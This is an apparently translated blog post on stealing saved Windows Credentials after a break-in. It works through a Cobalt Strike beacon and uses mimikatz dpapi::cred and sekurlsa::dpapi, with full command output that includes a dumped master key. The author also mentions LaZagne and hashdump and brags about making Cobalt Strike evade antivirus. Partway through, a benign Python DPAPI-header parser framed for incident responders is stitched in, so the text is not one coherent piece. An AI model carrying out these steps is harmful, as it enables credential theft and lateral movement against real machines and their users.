Sometimes, once we have access to a machine, we want to harvest as many passwords as possible. I always work from Cobalt Strike: I can run hashdump, logonpasswords, or mimikatz privilege::debug sekurlsa::dpapi, or upload LaZagne.exe and run laZagne.exe all to collect more passwords. But there are more ways than that. LaZagne does seem to bundle the method described in this post, yet it is not exhaustive, and it is now itself being hunted by Windows Defender, so the situation is not promising. One can of course rebuild it from source to evade detection, or do so from its Python source, but its incompleteness is the real weakness, and that is when you need to do it by hand.
mimikatz is also hunted by every kind of AV! That is why I use Cobalt Strike: I have made Cobalt Strike evade AV, so mimikatz run through it goes unnoticed as well.

beacon> shell dir /a c:\users\<username>\appdata\local\microsoft\credentials\
[*] Tasked beacon to run: dir /a c:\users\administrator\appdata\local\microsoft\credentials\
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is CE31-FE5F

 Directory of c:\users\administrator\appdata\local\microsoft\credentials

04/05/2018  09:44 AM    <DIR>          .
04/05/2018  09:44 AM    <DIR>          ..
03/06/2018  03:02 PM               380 7FA328901B1E61D20AFA2CEA89D36009
03/06/2018  03:02 PM               588 93C6B874E906FCF89C21933241164C86
04/05/2018  09:44 AM               412 C683A6C121208458166FA7833F8EC83E
02/23/2018  01:37 PM            11,204 DFBE70A7E5CC19A398EBF1B96859CE5D
               4 File(s)         12,584 bytes
               2 Dir(s)   4,612,083,712 bytes free

Those are all of the Credentials; we have to unlock them one by one. For example, let's decrypt the third one, C683A6C121208458166FA7833F8EC83E.

beacon> mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\C683A6C121208458166FA7833F8EC83E
[*] Tasked beacon to run mimikatz's dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\C683A6C121208458166FA7833F8EC83E command
[+] host called home, sent: 825925 bytes
[+] received output:
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {3eba1e8e-2efc-402e-8829-d0fd9f2e0f4a}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 00000030 - 48
  szDescription      : Local Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : b1d4fdf2947beabf350bb95c5e8da0ac
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         : 
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 7881067f9d6878854a2f5ddaa88f1b3c
  dwDataLen          : 000000d8 - 216
  pbData             : b8cdb7945ab825e8edea9532d16230fe33eab0fc01c32c4be4058fdf20631d232eb5a9deee944xxxxxxxxxxxxxxxxxmarkxxxxxxxxxxxxxe6fc896d538a5d01610571f29141c330a5be3da63ef194f4677a7e7f8deed1c7aba94cab0f2d95ba9558b86a9733e8cc035ba49fd8c1340524f5bb797e68a7bf5487d1764608c8c7f8ac12a87f21b4079xxxxxxxxxxxxxxxxxmarkxxxxxxxxxxxxxe0e2d93a184b09f6d01580a5390a17489e722fca14bc7bf7d18d77caec1419414ed3c082822c619e6aebedde5a1d1798a953b32a88f7000386bdb7a9b7c74d9c572763c
  dwSignLen          : 00000014 - 20
  pbSign             : f846214114391c480ffafc3baabd613b4c0394aa

We get this line: guidMasterKey : {3eba1e8e-2efc-402e-8829-d0fd9f2e0f4a}. The value of guidMasterKey is what we need.
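The structure mimikatz printed above is just the DPAPI blob header in clear, so an incident responder can map each saved credential file to the master key GUID it depends on without decrypting anything, for example to scope which files a compromised master key would expose. The parser below is an added example, not code from this post or from mimikatz; it assumes a raw CryptProtectData blob as input (the files under Credentials wrap that blob in a short credential-file header), and the sample blob is constructed here from the header values shown above with dummy encrypted data.

```python
import struct
import uuid

# Provider GUID carried by every DPAPI blob (a fixed constant, also in the post's output)
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
ALG_NAMES = {0x6603: "CALG_3DES", 0x8004: "CALG_SHA1", 0x6610: "CALG_AES_256", 0x800E: "CALG_SHA_512"}

def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4
def _lenval(buf, off):  # DWORD length followed by that many bytes
    n, off = _u32(buf, off)
    return bytes(buf[off:off + n]), off + n
def _guid(buf, off):  # Windows GUID struct: Data1..3 little-endian, Data4 as-is
    return uuid.UUID(bytes_le=bytes(buf[off:off + 16])), off + 16

def parse_dpapi_blob(buf):
    """Walk the CryptProtectData blob header in the order mimikatz prints it."""
    version, off = _u32(buf, 0)
    provider, off = _guid(buf, off)
    if version != 1 or provider != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob")
    mk_guid, off = _guid(buf, off + 4)  # +4 skips dwMasterKeyVersion
    flags, off = _u32(buf, off)
    desc, off = _lenval(buf, off)
    alg_crypt, _crypt_bits = struct.unpack_from("<II", buf, off)
    salt, off = _lenval(buf, off + 8)
    _hmac_key, off = _lenval(buf, off)
    alg_hash, _hash_bits = struct.unpack_from("<II", buf, off)
    _hmac2_key, off = _lenval(buf, off + 8)
    data, off = _lenval(buf, off)
    sign, off = _lenval(buf, off)
    if off != len(buf):
        raise ValueError("trailing bytes after pbSign")
    return {"guidMasterKey": "{%s}" % mk_guid, "dwFlags": flags, "dwDataLen": len(data),
            "szDescription": desc.decode("utf-16-le").rstrip("\0"), "pbSalt": salt.hex(),
            "algCrypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
            "algHash": ALG_NAMES.get(alg_hash, hex(alg_hash))}

def build_dpapi_blob(mk_guid, description, salt, data, sign):  # same layout, for the sample only
    lv = lambda b: struct.pack("<I", len(b)) + b  # length-prefixed field
    return (struct.pack("<I", 1) + DPAPI_PROVIDER.bytes_le + struct.pack("<I", 1)
            + uuid.UUID(mk_guid).bytes_le + struct.pack("<I", 0x20000000)
            + lv((description + "\0").encode("utf-16-le"))
            + struct.pack("<II", 0x6603, 192) + lv(salt) + lv(b"")
            + struct.pack("<II", 0x8004, 160) + lv(b"\0" * 16) + lv(data) + lv(sign))

# Constructed sample reusing the header values the post shows; pbData is dummy zeros
SAMPLE_BLOB = build_dpapi_blob("3eba1e8e-2efc-402e-8829-d0fd9f2e0f4a", "Local Credential Data",
                               bytes.fromhex("b1d4fdf2947beabf350bb95c5e8da0ac"), b"\0" * 216,
                               bytes.fromhex("f846214114391c480ffafc3baabd613b4c0394aa"))
```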

beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 825929 bytes
[+] received output:

Authentication Id : 0 ; 1494757 (00000000:0016cee5)
Session           : Batch from 0
User Name         : Administrator
Domain            : PORTALDEV
Logon Server      : PORTAL-DEV1
Logon Time        : 4/7/2018 11:32:20 AM
SID               : S-1-5-21-284598634-2221908637-1703617853-500


Authentication Id : 0 ; 206890 (00000000:0003282a)
Session           : Service from 0
User Name         : MSSQLFDLauncher
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 4/7/2018 11:26:22 AM
SID               : S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582


Authentication Id : 0 ; 389321 (00000000:0005f0c9)
Session           : RemoteInteractive from 2
User Name         : administrator
Domain            : PORTALDEV
Logon Server      : PORTAL-DEV1
Logon Time        : 4/7/2018 11:26:47 AM
SID               : S-1-5-21-284598634-2221908637-1703617853-500
     [00000000]
     * GUID      :  {3eba1e8e-2efc-402e-8829-d0fd9f2e0f4a}
     * Time      :  4/8/2018 2:34:45 PM
     * MasterKey :  5ede0ba6e8841d33c7b711ecdc1c6df60dd7ad836f7fa4c75ab6e592257fe25d8be1ffa8f21fb06f8e8ae07bea1b118333447cf6116b83d9cdee40c974b29a46
     * sha1(key) :  b9b910fb85bc5c1bdc19a87a9203e9853a656072

Find the MasterKey above that corresponds to {3eba1e8e-2efc-402e-8829-d0fd9f2e0f4a}; it is 5ede0ba6e8841d33c7b711ecdc1c6df60dd7ad836f7fa4c75ab6e592257fe25d8be1ffa8f21fb06f8e8ae07bea1b118333447cf6116b83d9cdee40c974b29a46. Then run mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\<file to decrypt> /masterkey:<obtained MasterKey>, which here is:

mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\C683A6C121208458166FA7833F8EC83E /masterkey:5ede0ba6e8841d33c7b711ecdc1c6df60dd7ad836f7fa4c75ab6e592257fe25d8be1ffa8f21fb06f8e8ae07bea1b118333447cf6116b83d9cdee40c974b29a46

After running it you get the result, although unknown problems cannot be ruled out!!
The value of CredentialBlob is the secret!

If you still don't understand, read these; the rest you can work out yourself.
https://www.t00ls.net/articles-41926.html
http://www.freebuf.com/articles/network/146460.html

2 Replies to "Using mimikatz to obtain local Credentials"
